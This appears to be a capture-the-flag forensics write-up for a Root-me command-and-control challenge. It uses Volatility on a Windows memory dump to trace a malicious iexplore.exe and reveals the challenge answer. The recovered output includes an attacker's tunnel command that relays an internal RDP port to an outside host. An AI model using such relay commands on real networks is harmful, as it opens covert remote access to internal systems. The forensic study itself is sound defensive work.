Rootme Command and control level 4
Root-me.org
Command & Control - Level 4
Malware Analysis
We now know that iexplore.exe is the malware. So now need to figure out what’s the ip of the internal server used by the hackers.
So let’s go back to the process list
vol.py --profile=Win7SP1x86 -f ch2.dmp pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x87978b78 System 4 0 103 3257 ------ 0 2013-01-12 16:38:09 UTC+0000
0x88c3ed40 smss.exe 308 4 2 29 ------ 0 2013-01-12 16:38:09 UTC+0000
0x8929fd40 csrss.exe 404 396 9 469 0 0 2013-01-12 16:38:14 UTC+0000
0x892ac2b8 wininit.exe 456 396 3 77 0 0 2013-01-12 16:38:14 UTC+0000
0x88d03a00 csrss.exe 468 448 10 471 1 0 2013-01-12 16:38:14 UTC+0000
0x892ced40 winlogon.exe 500 448 3 111 1 0 2013-01-12 16:38:14 UTC+0000
0x896294c0 services.exe 560 456 6 205 0 0 2013-01-12 16:38:16 UTC+0000
0x896427b8 lsass.exe 576 456 6 566 0 0 2013-01-12 16:38:16 UTC+0000
0x8962f7e8 lsm.exe 584 456 10 142 0 0 2013-01-12 16:38:16 UTC+0000
0x8962f030 svchost.exe 692 560 10 353 0 0 2013-01-12 16:38:21 UTC+0000
0x897b5c20 svchost.exe 764 560 7 263 0 0 2013-01-12 16:38:23 UTC+0000
0x89805420 svchost.exe 832 560 19 435 0 0 2013-01-12 16:38:23 UTC+0000
0x89852918 svchost.exe 904 560 17 409 0 0 2013-01-12 16:38:24 UTC+0000
0x8986b030 svchost.exe 928 560 26 869 0 0 2013-01-12 16:38:24 UTC+0000
0x898911a8 svchost.exe 1084 560 10 257 0 0 2013-01-12 16:38:26 UTC+0000
0x898b2790 svchost.exe 1172 560 15 475 0 0 2013-01-12 16:38:27 UTC+0000
0x898a7868 AvastSvc.exe 1220 560 66 1180 0 0 2013-01-12 16:38:28 UTC+0000
0x8a0f9c40 spoolsv.exe 1712 560 14 338 0 0 2013-01-12 16:38:58 UTC+0000
0x8a102748 svchost.exe 1748 560 18 310 0 0 2013-01-12 16:38:58 UTC+0000
0x88cded40 sppsvc.exe 1872 560 4 143 0 0 2013-01-12 16:39:02 UTC+0000
0x8a1d84e0 vmtoolsd.exe 1968 560 6 220 0 0 2013-01-12 16:39:14 UTC+0000
0x9541c7e0 wlms.exe 336 560 4 45 0 0 2013-01-12 16:39:21 UTC+0000
0x8a1f5030 VMUpgradeHelpe 448 560 4 89 0 0 2013-01-12 16:39:21 UTC+0000
0x9542a030 TPAutoConnSvc. 1612 560 9 135 0 0 2013-01-12 16:39:23 UTC+0000
0x87ac0620 taskhost.exe 2352 560 8 149 1 0 2013-01-12 16:40:24 UTC+0000
0x87ad44d0 dwm.exe 2496 904 5 77 1 0 2013-01-12 16:40:25 UTC+0000
0x87ac6030 explorer.exe 2548 2484 24 766 1 0 2013-01-12 16:40:27 UTC+0000
0x87ae2880 TPAutoConnect. 2568 1612 5 146 1 0 2013-01-12 16:40:28 UTC+0000
0x87a9c288 conhost.exe 2600 468 1 35 1 0 2013-01-12 16:40:28 UTC+0000
0x87b82438 VMwareTray.exe 2660 2548 5 80 1 0 2013-01-12 16:40:29 UTC+0000
0x87aa9220 VMwareUser.exe 2676 2548 8 190 1 0 2013-01-12 16:40:30 UTC+0000
0x87b784b0 AvastUI.exe 2720 2548 14 220 1 0 2013-01-12 16:40:31 UTC+0000
0x898fe8c0 StikyNot.exe 2744 2548 8 135 1 0 2013-01-12 16:40:32 UTC+0000
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x898fbb18 SearchIndexer. 2900 560 13 636 0 0 2013-01-12 16:40:38 UTC+0000
0x87bd35b8 wmpnetwk.exe 3176 560 9 240 0 0 2013-01-12 16:40:48 UTC+0000
0x89f3d2c0 svchost.exe 3352 560 9 141 0 0 2013-01-12 16:40:58 UTC+0000
0x87c6a2a0 swriter.exe 3452 2548 1 19 1 0 2013-01-12 16:41:01 UTC+0000
0x87ba4030 soffice.exe 3512 3452 1 28 1 0 2013-01-12 16:41:03 UTC+0000
0x95483d18 soffice.bin 3556 3544 0 -------- 1 0 2013-01-12 16:41:05 UTC+0000 2013-01-12 16:41:39 UTC+0000
0x87b8ca58 soffice.bin 3564 3512 12 400 1 0 2013-01-12 16:41:05 UTC+0000
0x89f1d3e8 svchost.exe 3624 560 14 348 0 0 2013-01-12 16:41:22 UTC+0000
0x95495c18 taskmgr.exe 1232 2548 6 116 1 0 2013-01-12 16:42:29 UTC+0000
0x87bf7030 cmd.exe 3152 2548 1 23 1 0 2013-01-12 16:44:50 UTC+0000
0x87c595b0 conhost.exe 3228 468 2 54 1 0 2013-01-12 16:44:50 UTC+0000
0x89898030 cmd.exe 1616 2772 2 101 1 0 2013-01-12 16:55:49 UTC+0000
0x954826b0 conhost.exe 2168 468 2 49 1 0 2013-01-12 16:55:50 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
0x87c90d40 audiodg.exe 1720 832 5 117 0 0 2013-01-12 16:58:11 UTC+0000
0x87cbfd40 winpmem-1.3.1. 3144 3152 1 23 1 0 2013-01-12 16:59:17 UTC+0000
We got 3 iexplore processes.
vol.py --profile=Win7SP1x86 -f ch2.dmp pslist | grep iexplore
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
We can start by looking if any of the explore is the parent of other processes.
vol.py --profile=Win7SP1x86 -f ch2.dmp pslist | grep -e "3044" -e "2772" -e "1136"
Volatility Foundation Volatility Framework 2.6
0x87b6b030 iexplore.exe 2772 2548 2 74 1 0 2013-01-12 16:40:34 UTC+0000
0x89898030 cmd.exe 1616 2772 2 101 1 0 2013-01-12 16:55:49 UTC+0000
0x9549f678 iexplore.exe 1136 2548 18 454 1 0 2013-01-12 16:57:44 UTC+0000
0x87d4d338 iexplore.exe 3044 1136 37 937 1 0 2013-01-12 16:57:46 UTC+0000
There’s a cmd.exe
that has 2772 as a parent.
Let’s run the cmdscan
to see all the commands ran.
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x2ff638 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 5 LastAdded: 4 LastDisplayed: 4
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #0 @ 0x2fcd58: cd %temp%
Cmd #1 @ 0x2fd348: dir
Cmd #2 @ 0x2e1038: cd imagedump
Cmd #3 @ 0x2fd378: dir
Cmd #4 @ 0x304870: winpmem-1.3.1.exe ram.dmp
Cmd #12 @ 0x2d0038: 0?0^B
Cmd #36 @ 0x2d00c4: /?0?-???-
Cmd #37 @ 0x2fc1a8: 0?-???????/^A
**************************************************
CommandProcess: conhost.exe Pid: 3228
CommandHistory: 0x3007a8 Application: winpmem-1.3.1.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x90
**************************************************
CommandProcess: conhost.exe Pid: 2168
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
Cmd #6 @ 0x350039: ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????h??????????????^A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????^A???????????????????????????????????????????????????????????????^A???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????^A
Cmd #16 @ 0x330035: ?
Cmd #36 @ 0x4000c4: A?B?@???@
Cmd #37 @ 0x4140f0: B?@????
(END)
There’s nothing interesting here. There’s another command that allows us to see every all the input and output of the commands.
The command being consoles
...
ConsoleProcess: conhost.exe Pid: 2168
Console: 0x1081c0 CommandHistorySize: 50
HistoryBufferCount: 3 HistoryBufferMax: 4
OriginalTitle: %SystemRoot%\system32\cmd.exe
Title: C:\Windows\system32\cmd.exe
AttachedProcess: cmd.exe Pid: 1616 Handle: 0x64
----
CommandHistory: 0x427a60 Application: tcprelay.exe Flags:
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427890 Application: whoami.exe Flags:
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x0
----
CommandHistory: 0x427700 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x64
There’s a tcprelay.exe application that got executed. The PID being 1616, exactly the same PID as we saw before.
We’ll run a strings and see where the word tcprelay can be found.
strings ch2.dmp | grep tcprelay
tcprelay.exe
tcprelay.exe
tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
tcprelay.c
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exe
tcprelay.exe
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
01/12/2013 05:57 PM 22,078 tcprelay.exe
mp\TEMP23\tcprelay.exe
Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
01/12/2013 05:57 PM 22,078 tcprelay.exe
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay
C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exe
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeN_
C:\Users\John Doe\AppData\Local\Temp\TEMP23\tcprelay.exeJ"
5C:\Users\JOHNDO~1\AppData\Local\Temp\TEMP23\tcprelay.exeg[j
tcprelay.c
tcprelay.exe 192.168.0.22 3389 yourcsecret.co.tv 443
I think we got it. Internal server using RDP port.